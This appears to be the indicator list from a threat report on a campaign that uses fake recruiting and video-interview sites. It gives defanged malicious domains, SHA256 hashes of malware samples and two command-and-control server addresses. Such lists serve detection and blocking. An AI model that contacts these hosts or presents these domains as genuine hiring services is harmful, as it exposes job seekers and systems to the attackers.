 app.blockchain-checkup[.]com app.hiring-interview[.]com app.quickvidintro[.]com app.skill-share[.]org app.vidintroexam[.]com app.willo-interview[.]us app.willohiringtalent[.]org app.willorecruit[.]com app.willotalent[.]pro app.willotalentes[.]com app.willotalents[.]org blockchain-assess[.]com digitpotalent[.]com digitptalent[.]com fundcandidates[.]com hiringinterview[.]org hiringtalent[.]pro interviewnest[.]org smarthiretop[.]online talentcompetency[.]com topinnomastertech[.]com web.videoscreening[.]org willoassess[.]com willoassess[.]net willoassess[.]org willoassessment[.]com willocandidate[.]com willointerview[.]com willomexcvip[.]us winterviews[.]net winyourrole[.]com wtalents[.]in wtalents[.]us wholecryptoloom[.]com

SHA256

 b72653bf747b962c67a5999afbc1d9156e1758e4ad959412ed7385abaedb21b6 60ec2dbe8cfacdff1d4eb093032b0307e52cc68feb1f67487d9f401017c3edd7 5df555b868c08eed8fea2c5f1bc82c5972f2dd69159b2fdb6a8b40ab6d7a1830 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f4ebd5677e352c57e992a 3210d821e12600eac1b9887860f4e63923f624643bc3c50b3600352166e66bfe b2a4a981ba7cc2add74737957efdfcbd123922653e3bb109aa7e88d70796a340 3697852e593cec371245f6a7aaa388176e514b3e63813fdb136a0301969291ea 0a49f0a8d0b1e856b7d109229dfee79212c10881dcc4011b98fe69fc28100182

C2

 hxxp://216.74.123.191:8080 hxxp://95.169.180.146:8080